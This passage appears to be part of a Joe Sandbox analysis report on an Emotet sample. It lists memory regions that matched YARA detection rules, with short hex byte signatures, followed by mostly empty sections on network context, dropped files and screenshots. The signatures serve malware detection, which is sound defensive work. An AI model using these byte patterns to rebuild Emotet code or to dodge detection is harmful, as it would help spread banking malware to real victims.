        00000001.00000002.2127695275.0000000002111000.00000020.00000001.sdmpEmotetEmotet Payloadkevoreilly
        • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 12 02 85 C0
        • 0x5066:$snippet6: 33 C0 21 05 0C 3C 12 02 A3 08 3C 12 02 39 05 60 03 12 02 74 18 40 A3 08 3C 12 02 83 3C C5 60 03 ...
        00000006.00000002.3815990072.0000000000F21000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000006.00000002.3815990072.0000000000F21000.00000020.00000001.sdmpEmotetEmotet Payloadkevoreilly
          • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B F3 00 85 C0
          • 0x5066:$snippet6: 33 C0 21 05 0C 3C F3 00 A3 08 3C F3 00 39 05 60 03 F3 00 74 18 40 A3 08 3C F3 00 83 3C C5 60 03 ...
          00000006.00000002.3815703856.0000000000610000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            00000006.00000002.3815703856.0000000000610000.00000040.00000001.sdmpEmotetEmotet Payloadkevoreilly
            • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0
            • 0x59a5:$snippet6: 33 C0 21 05 0C 3C 41 00 A3 08 3C 41 00 39 05 60 03 41 00 74 18 40 A3 08 3C 41 00 83 3C C5 60 03 ...
            00000000.00000002.2102869064.0000000002281000.00000020.00000001.sdmpEmotetEmotet Payloadkevoreilly
            • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 29 02 85 C0
            • 0x5066:$snippet6: 33 C0 21 05 0C 3C 29 02 A3 08 3C 29 02 39 05 60 03 29 02 74 18 40 A3 08 3C 29 02 83 3C C5 60 03 ...
            00000001.00000002.2127467020.0000000000750000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
              00000001.00000002.2127467020.0000000000750000.00000040.00000001.sdmpEmotetEmotet Payloadkevoreilly
              • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0
              • 0x59a5:$snippet6: 33 C0 21 05 0C 3C 41 00 A3 08 3C 41 00 39 05 60 03 41 00 74 18 40 A3 08 3C 41 00 83 3C C5 60 03 ...

              Unpacked PEs

              No yara matches

              Sigma Overview

              No Sigma rule has matched

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.